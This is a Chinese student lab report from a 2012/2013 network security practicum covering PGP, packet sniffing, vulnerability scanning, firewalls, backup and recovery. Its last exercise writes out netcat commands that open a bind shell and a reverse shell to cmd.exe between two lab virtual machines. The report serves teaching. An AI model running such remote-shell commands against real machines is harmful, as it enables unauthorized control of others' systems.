信息工程学院2012/2013学年第1学期《网络安全技术项目实训》实习报告信息工程学院2012/2013学年第1学期一、实训要求序号实训任务1PGP软件的应用2扫描的原理以及扫描工具的使用3防火墙的安装和应用4数据的备份和恢复GHOST5远程控制的原理以及远程控制软件的使用(木马)二、实训环境硬件:CPU:IntelE7500内存:4GB硬盘:SATA-500GB显示器:17寸LED显卡:9500GTU盘:自备软件:WindowsXP、Office2003、PGP、GHOST、远程控制软件三、实训内容1.数据加密软件的使用(1)PGP软件的功能包括数字签名、消息认证、消息加密、数据压缩、邮件兼容和数据分段。安装时先安装英文版,再安装中文版,重启后使用,可以进行密钥管理、剪贴板信息加解密、当前窗口信息加解密、文件加解密和对磁盘的加密。(2)加密文件。在桌面新建一个文本文档,右击选择“PGP”中的“加密”,该文档就生成加密后的文件,直接打开后是一些乱码。(3)导出密钥。打开PGPKeys,在菜单栏中选择“密钥”→“导出”,设置保存位置,即可导出自己的公钥和密钥。信息工程学院2012/2013学年第1学期2.DDOS攻击(1)Sniffer可以监视网络状态、数据流动情况以及网络上传输的信息。先安装英文版再安装中文版,重启后可使用。(2)打开界面开始捕获数据包,它会以不同形式说明捕获到的信息。捕获完之后,选择“解码”选项,可看到主机通过协议发送或接受到的信息。选择“矩阵”选项,可看到主机各协议下的数据连接情况,线越粗代表数据传输越紧密。选择“主机列表”,可看到主机各协议下发送和接受的数据包情况。信息工程学院2012/2013学年第1学期选择“protocoldist.”可查看主机不同协议的分布情况。(3)X-Scan-v3.3-cn属于漏洞扫描工具,它首先探测存活主机,进行端口扫描,通过对探测相应数据包的分析判断是否存在漏洞。(4)打开软件,在“设置”中设置参数,开始扫描。扫描完成后显示检测结果,发现1个漏洞并提出一些警告和提示,并进行分析和提出解决方案。信息工程学院2012/2013学年第1学期3、防火墙的安装和应用(1)在天网防火墙设置向导中,设置IP地址,在应用程序设置中选择允许防火墙访问的程序。完成后进行补丁。信息工程学院2012/2013学年第1学期(2)打开天网防火墙,在主界面中可根据需要设置安全级别,可查看和修改权限和IP规则。(3)在应用程序访问网络权限设置中可看到允许防火墙访问的程序,可对其进行增加和删除,针对某一程序单击“选项”进行设置。信息工程学院2012/2013学年第1学期(4)在自定义IP规则中,查看事件及其响应动作。选中某个规则可以修改其设置,查看和阻止别人发出的攻击或扫描。(5)打开浏览器访问,防火墙出现警告信息。信息工程学院2012/2013学年第1学期4、数据的备份和恢复(1)打开GHOST,选择磁盘到磁盘的备份,保存位置完成备份。(2)利用Easyrecovery软件恢复通过回收站删除的文件。在E盘新建一个文本文档将其删除至回收站,打开Easyrecovery软件选择“数据恢复”中的“删除恢复”。信息工程学院2012/2013学年第1学期(3)选择一个要恢复删除文件的分区,设置文件过滤器,选择要恢复的文件及其存储位置进行恢复。5、远程控制(1)打开两台虚拟机,用ping命令实现相互之间的连接,通过nc实现远程控制中信息工程学院2012/2013学年第1学期伪装蜜罐、主动连接和反弹的功能。(2)伪装蜜罐。在A机上输入nc.exe–l–p8000,在B机上输入telnet192.168.0.208000,B机可控制A机。在A机上依次输入字符就能在B机上显示出来。(3)主动连接。在A机上输入nc.exe–l–p9000-t–ec:\windows\system32\cmd.exe,在B机上输入telnet192.168.0.209000,B机可控制A机。在A机的E盘新建一个文本文档,通过B机可查看A机E盘中的文档属性。(4)反弹。在A机上输入nc.exe–l–p10000,在B机上输入nc.exe-t–ec:\windows\system32\cmd.exe192.168.0.2010000,A机可控制B机。在B机E盘新建一个文本文档,通过A机可查看B机E盘文档的属性。信息工程学院2012/2013学年第1学期四、实习总结经过本次实习,我学会了一些常用信息安全软件的操作,更加熟悉了防火墙以及远程控制软件的应用,同时也掌握了一些扫描软件和攻击软件的应用。掌握了使用PGP软件对文件进行加密与解密操作;两种扫描工具的使用(X-Scan-v3.3-cn软件与sniffer软件);防火墙(天网防火墙)的安装于使用;数据备份与恢复软件的使用(一键GHOST软件与Easyrecovery恢复软件);远程控制软件的使用。通过对这些软件的学习,我更加明白信息安全对整个网络的重要性,同时,我也掌握了一些防御功能,能有效的防御攻击,虽然在整个学习过程中,我遇到了一些问题,但是经过同学和老师的帮助,我完成了这次实训任务。在这次实训中有了很大的收获。不仅了解到许多网络相关的知识,还掌握了许多网络安全的保护知识与设置操作,是自己在计算机上又有了更新的掌握和认识。